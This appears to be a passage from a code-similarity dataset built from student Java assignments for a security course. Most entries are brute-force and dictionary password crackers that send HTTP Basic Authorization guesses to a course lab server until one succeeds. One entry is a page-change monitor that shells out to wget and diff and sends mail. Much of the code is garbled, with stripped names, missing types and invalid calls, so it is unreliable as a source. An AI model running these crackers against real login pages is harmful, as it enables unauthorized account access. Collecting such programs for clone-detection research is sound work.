\ {\n s = new Socket( hostname, port);\n }catch( UnknownHostException\
\ e)\n {\n System.out.println(\"'t find host\");\n }catch( IOException\
\ e)\n {\n System.out.println(\"Error connecting host \"+n);\n\
\t return;\n }\n while(s.isConnected() == false)\n continue;\n\
\ \n finish = System.currentTimeMillis();\n dif = finish - start;\n\
\ \n try\n {\n sin = s.getInputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n BufferedReader fromServer = new BufferedReader(new InputStreamReader(\
\ ));\n try\n {\n sout = s.getOutputStream();\n }catch(\
\ IOException e)\n {\n System.out.println(\"'t open stream\");\n\
\ }\n \n PrintWriter toServer = new PrintWriter( new OutputStreamWriter(\
\ sout));\n toServer.print(\"GET \"+filename+\" HTTP/1.0\\r\\n\"+\"Authorization:\
\ \"+Base64.encode(\"\"+\":\"+myPassword)+\"\\r\\n\\r\\n\");\n toServer.flush();\n\
\ \n try\n {\n inputLine = fromServer.readLine();\n \
\ }catch( IOException e)\n {\n System.out.println(\"'t open stream\"\
);\n\t inputLine = null;\n }\n \n java.util.StringTokenizer \
\ = new java.util.StringTokenizer( inputLine, \" \");\n i = 0;\n while(sin.hasMoreTokens())\n\
\ {\n tokens[i] = sin.nextToken();\n\t i++;\n }\n status\
\ = Integer.parseInt( tokens[1]);\n myTime = System.currentTimeMillis();\n\
\ if( status == 200)\n {\n System.out.println(\"Ok \"+myPassword);\n\
\t myMaster.retire( this);\n }\n \n toServer.send();\n try\n\
\ {\n fromServer.receive();\n }catch( IOException e)\n \
\ {\n System.out.println(\"'t open stream\");\n }\n try\n\
\ {\n s.connect();\n }catch( IOException e)\n {\n \
\ System.out.println(\"'t connection\");\n\t System.exit(0);\n }\n\
\ }\n public getTime()\n {\n return myTime;\n }\n \n}\n"
- "\n\nimport java.util.*;\nimport java.text.*;\nimport java.io.*;\nimport java.*;\n\
import java.net.*;\n\npublic class WatchDog\n{\n public static void main(String\
\ args[])\n {\n String s = null;\n String webpage = \"http://www.cs.rmit.edu./students/\"\
;\n \n \n String file1 = \"file1\";\n String file2 = \"file2\"\
;\n \n try\n {\n Process p = Runtime.getRuntime().exec(\"\
wget -O \" + file1 + \" \" + webpage);\n \n BufferedReader stdInput\
\ = new BufferedReader(new \n InputStreamReader(p.getInputStream()));\n\
\n BufferedReader stdError = new BufferedReader(new \n \
\ InputStreamReader(p.getErrorStream()));\n\n \n while ((s\
\ = stdInput.readLine()) != null) { \n System.out.println(s);\n \
\ }\n \n \n while ((s = stdError.readLine())\
\ != null) { \n System.out.println(s);\n }\n \n \
\ try\n {\n p.waitFor(); \n }\n catch\
\ (InterruptedException g) \n {\n } \n }\n catch (IOException\
\ e) {\n System.out.println(\"exception happened - here's what I know:\
\ \");\n e.printStackTrace();\n System.exit(-1);\n }\n \
\ \n while (true) \n {\n try\n {\n Process\
\ p = Runtime.getRuntime().exec(\"sleep 86400\"); \n \n \
\ BufferedReader stdInput = new BufferedReader(new \n InputStreamReader(p.getInputStream()));\n\
\n BufferedReader stdError = new BufferedReader(new \n \
\ InputStreamReader(p.getErrorStream()));\n\n \n while\
\ ((s = stdInput.readLine()) != null) { \n System.out.println(s);\n\
\ }\n \n \n while ((s = stdError.readLine())\
\ != null) { \n System.out.println(s);\n }\n \
\ \n try\n {\n p.waitFor(); \n \
\ }\n catch (InterruptedException g) \n {\n \
\ } \n }\n catch (IOException e) \n {\n System.out.println(\"\
exception happened - here's what I know: \");\n e.printStackTrace();\n\
\ System.exit(-1);\n } \n try \n {\n \
\ Process p = Runtime.getRuntime().exec(\"wget -O \" + file2 + \" \" + webpage);\n\
\ \n BufferedReader stdInput = new BufferedReader(new \n\
\ InputStreamReader(p.getInputStream()));\n\n BufferedReader\
\ stdError = new BufferedReader(new \n InputStreamReader(p.getErrorStream()));\n\
\n \n while ((s = stdInput.readLine()) != null) { \n \
\ System.out.println(s);\n }\n \n \
\ \n while ((s = stdError.readLine()) != null) { \n System.out.println(s);\n\
\ }\n \n try\n {\n p.waitFor();\
\ \n }\n catch (InterruptedException g) \n {\n\
\ } \n \n }\n catch (IOException e) \n \
\ {\n System.out.println(\"exception happened - here's what I\
\ know: \");\n e.printStackTrace();\n System.exit(-1);\n\
\ }\n try \n {\n \n Process p =\
\ Runtime.getRuntime().exec(\"diff \" + file1 + \" \" + file2);\n \n\
\ BufferedReader stdInput = new BufferedReader(new \n \
\ InputStreamReader(p.getInputStream()));\n\n BufferedReader stdError\
\ = new BufferedReader(new \n InputStreamReader(p.getErrorStream()));\
\ \n \n \n while ((s = stdError.readLine())\
\ != null) { \n System.out.println(s);\n }\n \
\ \n try\n {\n p.waitFor(); \n \
\ }\n catch (InterruptedException g) \n {\n \
\ }\n \n if ((p.exitValue()) == 1) \n { \n \
\ \n String mailServerURL = \"yallara.cs.rmit.edu.\";\n\
\ String host = \"yallara.cs.rmit.edu.\";\n String\
\ from = \"@yallara.cs.rmit.edu.\";\n \n String subject\
\ = \"Change Detected In WatchDog.java\";\n \n try\n \
\ {\n \t\n Socket csoc=new Socket(mailServerURL,25);\n\
\ BufferedReader in=new BufferedReader(\n \
\ new InputStreamReader(csoc.getInputStream()));\n \n\
\ PrintWriter out=new PrintWriter(csoc.getOutputStream(),true);\n\
\ System.out.println(\"HELO \"+host);\n System.out.println(in.readLine());\n\
\ out.println(\"MAIL FROM:\"+from);\n System.out.println(in.readLine());\n\
\ System.out.println(in.readLine());\n System.out.println(\"\
DATA\");\n System.out.println(in.readLine());\n \
\ System.out.println(\"SUBJECT:\"+subject);\n System.out.println(in.readLine());\n\
\ \n \n while ((s = stdInput.readLine())\
\ != null){\n System.out.println(s);\n }\n\
\ out.println(\".\");\n System.out.println(in.readLine());\n\
\ System.out.println(\"QUIT\");\n System.out.println(in.readLine());\
\ \n }\n catch(Exception e)\n \
\ {\n e.printStackTrace();\n System.out.println(\"\
Some error occoured while communicating server\");\n }\n \
\ } \n }\n catch (IOException e) \n {\n \
\ System.out.println(\"exception happened - here's what I know: \");\n\
\ e.printStackTrace();\n System.exit(-1);\n }\n\
\ } \n }\n}"
- source_sentence: "\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\nimport\
\ java.util.*;\n\npublic class Dictionary {\n public static void main (String[]\
\ args) throws IOException {\n BufferedReader stdin = new BufferedReader (new\
\ InputStreamReader(System.in));\n\n d = new Date().getTime();\n \
\ FileReader fr = new FileReader(\"/usr/share/lib/dict/words\");\n BufferedReader\
\ bufr = new BufferedReader(fr);\n String word = bufr.readLine(); \
\ \n int total = 960;\n String[] pws = new String[total];\n\
\ int count = 0;\n while (word!=null){\n if (word.length()<=3)\
\ { pws[count] = word; count++;}\n\tword = bufr.readLine();\n }\n \
\ \n int i=0;\n int response = 0;\n for (i=0;i<count;i++){\n\
\ String uname = \"\";\n String userinfo = uname + \":\" + pws[i];\n\
\ try{\n String encoding = new bf.misc.BASE64Encoder().encode (userinfo.getBytes());\n\
\ URL url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n \
\ HttpURLConnection uc = (HttpURLConnection)url.openConnection();\n \
\ uc.setRequestProperty (\"Authorization\", \" \" + encoding);\n response\
\ = uc.getResponseCode();\n\t if (response == 200) break;\n\t else uc.disconnect();\n\
\ }\n catch(IOException e){ System.err.println(e); e.printStackTrace();\
\ } \n catch(IllegalStateException s){ System.err.println(s); s.printStackTrace();\
\ }\n }\n System.out.println(\"Response \"+i+\" was \"+response);\n\
\ System.out.println(\"The successful password was \"+pws[i]);\n \
\ finish = new Date().getTime();\n float totaltime = (float)(finish-d)/1000;\n\
\ System.out.println(\"Time taken: \"+totaltime+ \" seconds.\");\n \
\ \n }\n}\n\n"
sentences:
- "\nimport java.net.*;\nimport java.io.*;\nimport java.util.*;\n\n\npublic class\
\ Dictionary {\n\n public static void main(String args[])\n {\n int i,j,k;\n\
\ String pass = new String();\n String UserPass = new String();\n String status\
\ = new String();\n String status1 = new String();\n BasicAuth auth = new BasicAuth();\n\
\ URLConnection connect;\n int start,end,diff;\n try {\n URL\
\ url = new URL (\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n\n\n\n \
\ start =System.currentTimeMillis();\n\n BufferedReader dis =\
\ new BufferedReader(new FileReader(\"words\"));\n\n\n while ((pass =\
\ dis.readLine()) != null)\n {\n\n\n UserPass= auth.encode(\"\
\",pass);\n\n connect = url.openConnection();\n connect.setDoInput(true);\n\
\ connect.setDoOutput(true);\n\n connect.setRequestProperty(\"\
Host\",\"sec-crack.cs.rmit.edu.\");\n connect.setRequestProperty(\"\
Get\",\"/SEC/2/ HTTP/1.1\");\n connect.setRequestProperty(\"Authorization\"\
,\" \" + UserPass);\n connect.connect();\n status =connect.getHeaderField(0);\n\
\ status1 = status.substring( 9,12);\n if (status.equalsIgnoreCase(\"\
HTTP/1.1 200 OK\"))\n {\n System.out.println(\"Password\
\ is \" + pass);\n end=System.currentTimeMillis();\n \
\ diff = end - start;\n System.out.println(\"Time Taken = \" + (diff/1000)\
\ + \" secs\");\n System.exit(0);\n }\n \
\ ((HttpURLConnection)connect).disconnect();\n connect = null;\n\
\ }\n\n System.out.println(\" match found\");\n\n \
\ dis.close();\n dis=null;\n\n connect = null;\n\n\
\ }\n\n catch (MalformedURLException malerr)\n {\n System.err.println(\"\
Unable Open URL\" + malerr);\n }\n\n catch (Exception ioerr)\n {\n System.err.println(\"\
Unable open file\" + ioerr);\n }\n\n\n\n\n }\n}"
- "import java.net.*;\nimport java.io.*;\nimport java.*;\n\n public class Dictionary\
\ {\n\n URLConnection conn = null;\n private static boolean status = false;\n\
\n public static void main (String args[]){\n Dictionary a = new Dictionary();\n\
\ String[] inp = {\"http://sec-crack.cs.rmit.edu./SEC/2/index.php\",\n \
\ \t\t\t\t \"\",\n \t\t\t\t \"\"};\n File file = new File(\"words\");\n\
\ exit:\n try {\n\t\t BufferedReader in = new BufferedReader(new FileReader(file));\n\
\t\t int attempt = 0;\n\t\t inp[2] = in.readLine();\n\t\t while (inp[2] != null)\
\ {\n\t\n\t\t\t if (inp[2].length() <= 3) {\n\t\t\t \tattempt++;\n\t\t\t \ta.doit(inp);\n\
\ \t\t \tif (status) {\n\t\t\t \t\t System.out.println(\"Crrect password is:\
\ \" + inp[2]);\n\t\t\t \t\t System.out.println(\"Number of attempts = \" + attempt);\n\
\t\t\t \t\t break exit;\n\t\t\t \t}\n\t\t \t }\n\t\t\t inp[2] = in.readLine();\n\
\ \t\t}\n\t } catch (FileNotFoundException e1) {\n\t\t \n\t\tSystem.err.println(\"\
File not found: \" + file);\n\t} catch (IOException e2) {\n\t\t\n\t\te2.printStackTrace();\n\
\t}\n\n }\n\n public void doit(String args[]) {\n \n try {\n \
\ BufferedReader in = new BufferedReader(\n new InputStreamReader\n\
\ (connectURL(new URL(args[0]), args[1], args[2])));\n String\
\ line;\n while ((line = in.readLine()) != null) {\n System.out.println(line);\n\
\ status = true;\n }\n }\n catch (IOException e)\
\ {\n \n }\n }\n\n public InputStream connectURL (URL url, String\
\ uname, String pword)\n throws IOException {\n conn = url.openConnection();\n\
\ conn.setRequestProperty (\"Authorization\",\n userNamePasswordBase64(uname,pword));\n\
\ conn.connect ();\n return conn.getInputStream();\n }\n\n public\
\ String userNamePasswordBase64(String username, String password) {\n return\
\ \" \" + base64Encode (username + \":\" + password);\n }\n\n private final\
\ static char base64Array [] = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n\
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z', '0', '1', '2', '3',\n '4', '5', '6',\
\ '7', '8', '9', '+', '/'\n };\n\n private static String base64Encode (String\
\ string) {\n String encodedString = \"\";\n byte bytes [] = string.getBytes\
\ ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length) {\n \
\ byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i\
\ >= bytes.length) {\n b2 = 0;\n b3 = 0;\n pad = 2;\n\
\ }\n else {\n b2 = bytes [i++];\n if (i >= bytes.length)\
\ {\n b3 = 0;\n pad = 1;\n }\n else\n\
\ b3 = bytes [i++];\n }\n byte c1 = (byte)(b1 >> 2);\n\
\ byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2\
\ & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString\
\ += base64Array [c1];\n encodedString += base64Array [c2];\n switch\
\ (pad) {\n case 0:\n encodedString += base64Array [c3];\n \
\ encodedString += base64Array [c4];\n break;\n case 1:\n\
\ encodedString += base64Array [c3];\n encodedString += \"=\"\
;\n break;\n case 2:\n encodedString += \"==\";\n \
\ break;\n }\n }\n return encodedString;\n }\n }\n\n"
- "\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\nimport java.util.*;\n\
\npublic class BruteForce {\n public static void main (String[] args) throws IOException\
\ {\n BufferedReader stdin = new BufferedReader (new InputStreamReader(System.in));\n\
\n int start = new Date().getTime();\n String[] letters = {\"a\",\"\
A\",\"b\",\"B\",\"c\",\"C\",\"d\",\"D\",\"e\",\"E\",\"f\",\"F\",\"g\",\"G\",\n\
\ \"h\",\"H\",\"i\",\"I\",\"j\",\"J\",\"k\",\"K\",\"\
l\",\"L\",\"m\",\"M\",\"n\",\"N\",\n\t\t\t \"o\",\"O\",\"p\",\"P\",\"q\",\"Q\"\
,\"r\",\"R\",\"s\",\"S\",\"t\",\"T\",\"u\",\"U\",\n\t\t\t \"v\",\"V\",\"w\",\"\
W\",\"x\",\"X\",\"y\",\"Y\",\"z\",\"Z\"};\n int len = 52;\n int total\
\ = 52;\n String[] cad = new String[total];\n int t=0;\n \n \
\ for (int i=0;i<=len-1;i++){\n\t cad[t] = letters[i];\n\t t++;\n } \n\
\ for (int i=0;i<=len-1;i++){\n for (int j=0;j<=len-1;j++){\n\t \
\ cad[t] = letters[j]+letters[i];\n\t t++;\n }}\n for (int i=0;i<=len-1;i++){\n\
\ for (int j=0;j<=len-1;j++){\n for (int k=0;k<=len-1;k++){\n\t \
\ cad[t] = letters[k]+letters[j]+letters[i];\n\t t++;\n }}}\n \
\ \n int response = 0;\n for (t=0;t<=total-1;t++){\n String\
\ uname = \"\";\n String userinfo = uname + \":\" + cad[t];\n try{\n\
\ String encoding = new url.misc.BASE64Encoder().encode (userinfo.getBytes());\n\
\ URL url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n \
\ HttpURLConnection uc = (HttpURLConnection)url.openConnection();\n \
\ uc.setRequestProperty (\"Authorization\", \" \" + encoding);\n response\
\ = uc.getResponseCode();\n\t if (response == 200) break;\n\t else uc.disconnect();\n\
\ }\n catch(IOException e){ System.err.println(e); e.printStackTrace();\
\ } \n catch(IllegalStateException s){ System.err.println(s); s.printStackTrace();\
\ }\n }\n System.out.println(\"Response \"+t+\" was \"+response);\n\
\ System.out.println(\"The successful password was \"+cad[t]);\n \
\ finish = new Date().getTime();\n float totaltime = (float)(finish-start)/1000;\n\
\ System.out.println(\"Total time: \"+totaltime+\" seconds\");\n }\n}\n\
\n"
- source_sentence: "import java.net.*;\nimport java.io.*;\n\npublic class BruteForce\
\ {\n private String strUserName;\n private String strURL;\n private int iAttempts;\n\
\ \n public BruteForce(String strURL,String strUserName) {\n this.strURL\
\ = strURL;\n this.strUserName = strUserName;\n this.iAttempts = 0 ;\n\n\
\ }\n \n public String getPassword(){\n URL u;\n String result =\"\
\";\n PassGenBrute PG = new PassGenBrute(3);\n URLConnection uc;\n \
\ String strPassword = new String();\n String strEncode;\n try{\n\
\ while (result.compareTo(\"HTTP/1.1 200 OK\")!=0){\n \n \
\ strEncode = PG.getNewPassword();\n u = new URL(strURL);\n \
\ uc = u.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n\
\ strPassword = strEncode;\n strEncode = strUserName + \":\"\
\ + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n\
\ uc.setRequestProperty(\"Authorization\",\" \" + strEncode);\n \
\ \n result = uc.getHeaderField(0);\n uc = null;\n \
\ u = null;\n iAttempts++;\n }\n\n }\n catch (Exception\
\ me) {\n System.out.println(\"MalformedURLException: \"+me);\n }\n\
\ return(strPassword);\n }\n \n public int getAttempts(){\n return\
\ (iAttempts);\n };\n \n public static void main (String arg[]){\n timeStart\
\ = 0;\n timeEnd = 0;\n \n if (arg.length == 2) {\n BruteForce\
\ BF = new BruteForce(arg[0],arg[1]);\n System.out.println(\"Processing\
\ ... \");\n timeStart = System.currentTimeMillis();\n \n System.out.println(\"\
Password = \" + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n\
\ System.out.println(\"Total Time Taken = \" + (timeEnd - timeStart) + \"\
\ (msec)\");\n System.out.println(\"Total Attempts = \" + BF.getAttempts());\n\
\ }\n else {\n System.out.println(\"[Usage] java BruteForce <URL>\
\ <USERNAME>\");\n\n }\n\n }\n}\n\nclass PassGenBrute {\n private char[]\
\ password;\n public PassGenBrute(int lenght) {\n password = new char[lenght];\n\
\ for (int i = 0; i < lenght; i++){\n password[i] = 65;\n }\n password[0]--;\n\
\ }\n \n public String getNewPassword()\n throws PasswordFailureException{\n\
\ password[0]++;\n\n try {\n for (int i=0; i<password.length ; i++){\n\
\ if (password[i] == 90) {\n password[i] = 97;\n }\n \
\ if (password[i] > 122) {\n password[i] = 65;\n password[i+1]++;\n\
\ }\n }\n }\n catch (RuntimeException re){\n throw new\
\ PasswordFailureException ();\n }\n return new String(password);\n }\n\
}\n\nclass PasswordFailureException extends RuntimeException {\n\n public PasswordFailureException()\
\ {\n }\n}"
sentences:
- "import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary {\n private\
\ String strUserName;\n private String strURL;\n private String strDictPath;\n\
\ private int iAttempts;\n\n \n public Dictionary(String strURL,String\
\ strUserName,String strDictPath) {\n this.strURL = strURL;\n this.strUserName\
\ = strUserName;\n this.iAttempts = 0 ;\n this.strDictPath = strDictPath;\n\
\ }\n \n\n public String getPassword(){\n URL u;\n String result\
\ =\"\";\n PassGenDict PG = new PassGenDict(3,strDictPath);\n URLConnection\
\ uc;\n String strPassword = new String();\n String strEncode;\n \
\ try{\n while (result.compareTo(\"HTTP/1.1 200 OK\")!=0){\n \n\
\ strEncode = PG.getNewPassword();\n u = new URL(strURL);\n\
\ uc = u.openConnection();\n uc.setDoInput(true);\n \
\ uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode\
\ = strUserName + \":\" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n\
\ uc.setRequestProperty(\"Authorization\",\" \" + strEncode);\n \
\ \n result = uc.getHeaderField(0);\n uc = null;\n \
\ u = null;\n iAttempts++;\n }\n\n }\n catch (Exception\
\ me) {\n System.out.println(\"MalformedURLException: \"+me);\n }\n\
\ return(strPassword);\n }\n \n public int getAttempts(){\n return\
\ (iAttempts);\n };\n \n public static void main(String arg[]){\n timeStart\
\ = 0;\n timeEnd = 0;\n \n if (arg.length == 3) {\n Dictionary BF\
\ = new Dictionary(arg[0],arg[1],arg[2]);\n\n System.out.println(\"Processing\
\ ... \");\n timeStart = System.currentTimeMillis();\n System.out.println(\"\
Password = \" + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n\
\ System.out.println(\"Total Time Taken = \" + (timeEnd - timeStart) + \" (msec)\"\
);\n System.out.println(\"Total Attempts = \" + BF.getAttempts());\n }\n\
\ else {\n System.out.println(\"[Usage] java BruteForce <URL> <USERNAME>\
\ <Dictionary path>\");\n\n }\n\n }\n}\n\n\nclass PassGenDict {\n\n private\
\ char[] password;\n private String line;\n int iPassLenght;\n private BufferedReader\
\ inputFile;\n public PassGenDict(int lenght, String strDictPath) {\n try{\n\
\ inputFile = new BufferedReader(new FileReader(strDictPath));\n }\n \
\ catch (Exception e){\n }\n iPassLenght = lenght;\n }\n \n public\
\ String getNewPassword()\n throws PasswordFailureException{\n try {\n \
\ {\n line = inputFile.readLine();\n }while (line.length() !=\
\ iPassLenght);\n\n }\n catch (Exception e){\n throw new PasswordFailureException\
\ ();\n }\n return (line);\n }\n}\n\nclass PasswordFailureException extends\
\ RuntimeException {\n\n public PasswordFailureException() {\n }\n}"
- "\n\n\n\n\nimport java.io.IOException;\nimport java.net.*;\n\nimport java.io.*;\n\
import java.util.*;\n\n\n\npublic class Dictionary\n\n{\n\n\n static URL url\
\ = null;\n static URLConnection urlConnection;\n static InputStream urlStream;\n\
\n static String strOneLetterWords[];\n static String strTwoLetterWords[];\n\
\ static String strThreeLetterWords[];\n\n static String strExceptionPassword[];\n\
\n static String strLastPasswordTested;\n static String username = \"\";\n\
\n static int intNumberOfOneLetterWords = 0;\n static int intNumberOfTwoLetterWords\
\ = 0;\n static int intNumberOfThreeLetterWords = 0;\n\n static int intExceptionCount\
\ = -1;\n\n static int intNumberOfConnectionAttempts = 0;\n static int intTotalNumberOfWordsInFile\
\ = 0;\n\n\n\n\n public static void main (String args[])\n \n {\n\n\n \
\ \n \n Calendar calStart;\n Calendar calFinish; \n\
\ Date dateStart;\n Date dateFinish;\n lngStart;\n lngFinish;\n\
\n\n\n String strLine;\n String strTextFileName = \"/usr/share/lib/dict/words\"\
;\n\n boolean boolPasswordFound = false;\n boolean boolExceptionPasswordsTestedAgain\
\ = false;\n\n\n\n\n String urlString\n = \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
;\n\n int intCounter1;\n int intCounter2;\n int intCounter3;\n\n\
\ int intTotalNumberOfWordsChecked = 0;\n\n\n\n \n \n \
\ calStart = new GregorianCalendar();\n dateStart = calStart.getTime();\n\
\ lngStart = dateStart.getTime(); \n\n\n\n \n \n\
\ \n \n \n strExceptionPassword = new String[5000];\n\
\n\n \n \n getNumberOfVariousLengthsOfWords(strTextFileName);\n\
\n\n \n \n strOneLetterWords = new String[intNumberOfOneLetterWords];\n\
\ strTwoLetterWords = new String[intNumberOfTwoLetterWords];\n strThreeLetterWords\
\ = new String[intNumberOfThreeLetterWords];\n\n\n \n \n \
\ populateTheDifferentLengthArrays(strTextFileName);\n\n\n\n\n if (!boolPasswordFound)\
\ \n {\n\n\n \n \n\n intCounter1 = 0;\n\n \
\ while ( (!boolPasswordFound) && (intCounter1 < intNumberOfOneLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n boolPasswordFound\
\ = passwordWasFound(urlString,\n \
\ strOneLetterWords[intCounter1],\n \
\ boolPasswordFound);\n\n intCounter1++;\n\n intTotalNumberOfWordsChecked++;\n\
\n }\n\n\n\n \n \n\n intCounter1 = 0;\n\n\
\ while ( (!boolPasswordFound) && (intCounter1 < intNumberOfTwoLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n boolPasswordFound\
\ = passwordWasFound(urlString,\n \
\ strTwoLetterWords[intCounter1],\n \
\ boolPasswordFound);\n\n intCounter1++;\n\n intTotalNumberOfWordsChecked++;\n\
\n }\n\n\n\n \n \n\n intCounter1 = 0;\n\n\
\ while ( (!boolPasswordFound) && (intCounter1 < intNumberOfThreeLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n boolPasswordFound\
\ = passwordWasFound(urlString,\n \
\ strThreeLetterWords[intCounter1],\n \
\ boolPasswordFound);\n\n intCounter1++;\n\n \
\ intTotalNumberOfWordsChecked++;\n\n }\n\n\n\n \n \
\ \n \n\n intCounter1 = 0;\n\n while ( (!boolPasswordFound)\
\ && (intCounter1 < intNumberOfOneLetterWords) )\n {\n\n intCounter2\
\ = 0; \n\n while ( (!boolPasswordFound) && (intCounter2 < intNumberOfOneLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n \
\ boolPasswordFound \n = passwordWasFound(urlString,\n \
\ strOneLetterWords[intCounter1] + \n \
\ strOneLetterWords[intCounter2],\n \
\ boolPasswordFound); \n\n intCounter2++;\n\
\n intTotalNumberOfWordsChecked++;\n\n }\n\n\n \
\ intCounter1++;\n\n }\n\n\n\n \n \n \
\ \n \n \n\n intCounter1 = 0;\n\n while\
\ ( (!boolPasswordFound) && (intCounter1 < intNumberOfOneLetterWords) )\n \
\ {\n\n intCounter2 = 0; \n\n while ( (!boolPasswordFound)\
\ && (intCounter2 < intNumberOfOneLetterWords) )\n {\n\n \
\ intCounter3 = 0; \n\n while ( (!boolPasswordFound) && (intCounter3\
\ < intNumberOfOneLetterWords) )\n {\n\n boolPasswordFound\
\ = true;\n\n boolPasswordFound \n = passwordWasFound(urlString,\n\
\ strOneLetterWords[intCounter1] \
\ + \n strOneLetterWords[intCounter2]\
\ +\n strOneLetterWords[intCounter3],\n\
\ boolPasswordFound); \n\n \
\ intCounter3++;\n\n intTotalNumberOfWordsChecked++;\n\
\n }\n\n\n intCounter2++;\n\n }\n\n\n \
\ intCounter1++;\n\n }\n\n\n\n \n \n \
\ \n\n intCounter1 = 0;\n\n while ( (!boolPasswordFound)\
\ && (intCounter1 < intNumberOfOneLetterWords) )\n {\n\n intCounter2\
\ = 0; \n\n while ( (!boolPasswordFound) && (intCounter2 < intNumberOfTwoLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n \
\ boolPasswordFound \n = passwordWasFound(urlString,\n \
\ strOneLetterWords[intCounter1] + \n \
\ strTwoLetterWords[intCounter2],\n \
\ boolPasswordFound); \n\n intCounter2++;\n\
\n intTotalNumberOfWordsChecked++;\n\n }\n\n\n \
\ intCounter1++;\n\n }\n\n\n\n \n \n \
\ \n\n intCounter1 = 0;\n\n while ( (!boolPasswordFound)\
\ && (intCounter1 < intNumberOfTwoLetterWords) )\n {\n\n intCounter2\
\ = 0; \n\n while ( (!boolPasswordFound) && (intCounter2 < intNumberOfOneLetterWords)\
\ )\n {\n\n boolPasswordFound = true;\n\n \
\ boolPasswordFound \n = passwordWasFound(urlString,\n \
\ strTwoLetterWords[intCounter1] + \n \
\ strOneLetterWords[intCounter2],\n \
\ boolPasswordFound); \n\n intCounter2++;\n\
\n intTotalNumberOfWordsChecked++;\n\n }\n\n\n \
\ intCounter1++;\n\n }\n\n\n\n \n \n \
\ \n \n \n\n intCounter1 = 0;\n\n while\
\ ( (!boolPasswordFound) && (intCounter1 <= intExceptionCount) )\n {\n\
\n boolExceptionPasswordsTestedAgain = true;\n boolPasswordFound\
\ = true;\n\n boolPasswordFound \n = passwordWasFound(urlString,\n\
\ strExceptionPassword[intCounter1],\n \
\ boolPasswordFound); \n\n intCounter1++;\n\
\n intTotalNumberOfWordsChecked++;\n\n }\n\n } \n\n\n\
\n \n \n calFinish = new GregorianCalendar();\n dateFinish\
\ = calFinish.getTime();\n lngFinish = dateFinish.getTime(); \n\n\n\
\ \n \n System.out.println();\n System.out.println();\n\
\n\n System.out.println();\n System.out.println(\"Length of time for\
\ processing: \" + \n ((lngFinish - lngStart) / 1000)\
\ + \n \" seconds\");\n\n\n System.out.println();\n\
\ System.out.println(\"Total number of words in dictionary file = \" + intTotalNumberOfWordsInFile);\n\
\n\n System.out.println();\n System.out.println(\"Input file: number\
\ of words with one letter length = \" + intNumberOfOneLetterWords);\n \
\ System.out.println(\"Input file: number of words with two letter length =\
\ \" + intNumberOfTwoLetterWords);\n System.out.println(\"Input file: number\
\ of words with three letter length = \" + intNumberOfThreeLetterWords);\n\n\n\
\ System.out.println();\n System.out.println(\"Number of connection\
\ attempts = \" + intTotalNumberOfWordsChecked);\n\n\n System.out.println();\n\
\ System.out.println(\"Number of exceptions thrown = \" + (intExceptionCount\
\ + 1));\n System.out.println();\n\n\n if (intExceptionCount >= 0)\n\
\ {\n System.out.print(\"These passwords WERE \");\n\n if\
\ (boolExceptionPasswordsTestedAgain)\n System.out.print(\"tested again.\"\
);\n else\n System.out.print(\"NOT tested again.\");\n\n \
\ System.out.println();\n }\n\n\n if (boolPasswordFound) \n \
\ {\n System.out.println(\"The correct password WAS found - this password\
\ is '\" + \n strLastPasswordTested + \"'.\");\n \
\ } \n else\n {\n System.out.println(\"The correct password\
\ WAS NOT found.\");\n } \n \n System.out.println();\n\n\
\ }\n\n\n\n\n\n\n\n static void getNumberOfVariousLengthsOfWords(String TextFileName)\n\
\ \n {\n\n FileReader reader;\n BufferedReader inTextFile = null;\n\
\n String strLine;\n int intWordLength;\n\n\n\n try\n { \
\ \n \n \n \n \n \n reader\
\ = new FileReader(TextFileName);\n\n \n \n \n\
\ \n inTextFile = new BufferedReader(reader);\n\n\n \
\ strLine = inTextFile.readLine();\n\n\n while (strLine != null)\n \
\ {\n\n intTotalNumberOfWordsInFile++;\n\n strLine\
\ = strLine.trim();\n\n intWordLength = strLine.length();\n\n\n \
\ \n \n if (intWordLength == 1)\n \
\ intNumberOfOneLetterWords++;\n\n \n \n \
\ else if (intWordLength == 2) \n intNumberOfTwoLetterWords++;\n\
\n \n \n else if (intWordLength == 3)\n\
\ intNumberOfThreeLetterWords++;\n\n\n strLine = inTextFile.readLine();\n\
\n }\n\n }\n\n catch(FileNotFoundException e)\n {\n\n \
\ \n \n System.out.println();\n System.out.println(\"\
The file '\" + TextFileName + \"' cannot found.\");\n System.out.println();\n\
\n }\n\n catch(Exception e)\n {\n\n }\n\n finally\n \
\ {\n\n try\n {\n inTextFile.print();\n \
\ }\n catch(Exception e)\n {\n }\n\n inTextFile\
\ = null;\n reader = null;\n\n }\n\n } \n\n\n\n\n\n\n static\
\ void populateTheDifferentLengthArrays(String TextFileName)\n \n {\n\n \
\ FileReader reader;\n BufferedReader inTextFile = null;\n\n String\
